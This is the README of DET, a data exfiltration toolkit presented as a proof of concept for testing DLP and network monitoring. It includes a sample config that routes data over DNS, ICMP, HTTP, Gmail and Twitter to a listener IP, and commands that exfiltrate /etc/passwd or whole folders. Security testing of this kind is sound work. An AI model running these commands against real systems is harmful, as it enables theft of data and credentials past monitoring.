Home

Awesome

DET (extensible) Data Exfiltration Toolkit

DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time.

This is a Proof of Concept aimed at identifying possible DLP failures. This should never be used to exfiltrate sensitive/live data (say on an assessment)

The idea was to create a generic toolkit to plug any kind of protocol/service to test implmented Network Monitoring and Data Leakage Prevention (DLP) solutions configuration, against different data exfiltration techniques.

The primary repository has now moved to here.

Slides

DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Slides are available here.

Example usage (ICMP plugin)

Server-side:

asciicast

Client-side:

asciicast

Usage while combining two channels (Gmail/Twitter)

Server-side:

asciicast

Client-side:

asciicast

Installation

Clone the repo:

git clone https://github.com/sensepost/DET.git

Then:

pip install -r requirements.txt --user

Configuration

In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided and is called: config-sample.json

{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "dataexfil@gmail.com",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

Usage

Help usage

python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Server-side:

To load every plugin:

python det.py -L -c ./config.json

To load only twitter and gmail modules:

python det.py -L -c ./config.json -p twitter,gmail

To load every plugin and exclude DNS:

python det.py -L -c ./config.json -e dns

Client-side:

To load every plugin:

python det.py -c ./config.json -f /etc/passwd

To load only twitter and gmail modules:

python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

To load every plugin and exclude DNS:

python det.py -c ./config.json -e dns -f /etc/passwd

And in PowerShell (HTTP module):

PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Modules

So far, DET supports multiple protocols, listed here:

And other "services":

Experimental modules

So far, I am busy implementing new modules which are almost ready to ship, including:

Roadmap

References

Some pretty cool references/credits to people I got inspired by with their project:

Contact/Contributing

You can reach me on Twitter @PaulWebSec. Feel free if you want to contribute, clone, fork, submit your PR and so on.

License

DET is licensed under a MIT License. Permissions beyond the scope of this license may be available at info@sensepost.com